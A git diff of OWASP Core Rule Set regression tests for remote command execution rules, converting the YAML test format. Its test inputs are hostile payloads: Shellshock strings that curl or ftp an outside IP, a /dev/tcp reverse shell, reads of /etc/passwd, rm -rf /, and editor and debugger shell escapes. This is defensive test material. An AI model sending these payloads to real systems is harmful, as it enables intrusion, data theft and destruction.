- test_id: 23 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 24 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 25 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 27 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 28 desc: Test RCE with new semantic versions - ;gcc10.1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;gcc10.1<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 37 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 38 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 39 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 40 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 41 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 42 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 43 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 44 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 45 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-46 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 46 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - no_log_contains: id "932230" - - test_title: 932230-47 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + log: + no_expect_ids: [932230] + - test_id: 47 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;environment" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-48 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;environment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 48 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932230] + - test_id: 49 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;env --version" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;env --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 50 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<, azurit" description: Tests for fix of 932231 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886 - enabled: true - name: 932231.yaml + rule_id: 932231 tests: - - test_title: 932231-1 + - test_id: 1 desc: | True Negative Rule Integrity 1 arg value of "ifconfig;. rm -rf /; Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.0 - output: - log_contains: id "932231" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.0 + output: + log: + expect_ids: [932231] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index 26f808924..068a16d9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -2,128 +2,127 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Unix Command Injection" - enabled: true - name: 932232.yaml +rule_id: 932232 tests: - - test_title: 932232-1 + - test_id: 1 desc: "/?arg=;ps" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%3Bps" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%3Bps" + version: HTTP/1.0 + output: + log: + expect_ids: [932232] + - test_id: 2 desc: "/?arg=|vi (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%7Cvi%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%7Cvi%20%28x" + version: HTTP/1.0 + output: + log: + expect_ids: [932232] + - test_id: 3 desc: "/?arg=&w (x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26w%20%28x" - version: HTTP/1.0 - output: - log_contains: id "932232" - - test_title: 932232-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26w%20%28x" + version: HTTP/1.0 + output: + log: + expect_ids: [932232] + - test_id: 4 desc: "/?arg=&aptitude" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26aptitude" - version: HTTP/1.0 - output: - no_log_contains: id "932232" - - test_title: 932232-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26aptitude" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932232] + - test_id: 5 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" - - test_title: 932232-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+who" + version: HTTP/1.1 + output: + log: + expect_ids: [932232] + - test_id: 6 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner" - version: HTTP/1.1 - output: - no_log_contains: "id \"932232\"" - - test_title: 932232-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932232] + - test_id: 7 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+who" + version: HTTP/1.1 + output: + log: + expect_ids: [932232] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index ed96bb847..4ae77be63 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml @@ -2,685 +2,684 @@ meta: author: "Max Leske, Esad Cetiner, Xhoenix, Franziska Bühler, azurit" description: Unix shell RCE wordlist for more than 3 characters - enabled: true - name: 932235.yaml +rule_id: 932235 tests: - - test_title: 932235-1 + - test_id: 1 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;find /etc -name passwd -exec cat {} + - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;find /etc -name passwd -exec cat {} + + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 2 desc: "5Y3V6UZT" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;column passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;column passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 3 desc: "6BIVX1QB" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;bridge -b passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;bridge -b passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 4 desc: "7JRJIWP8" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 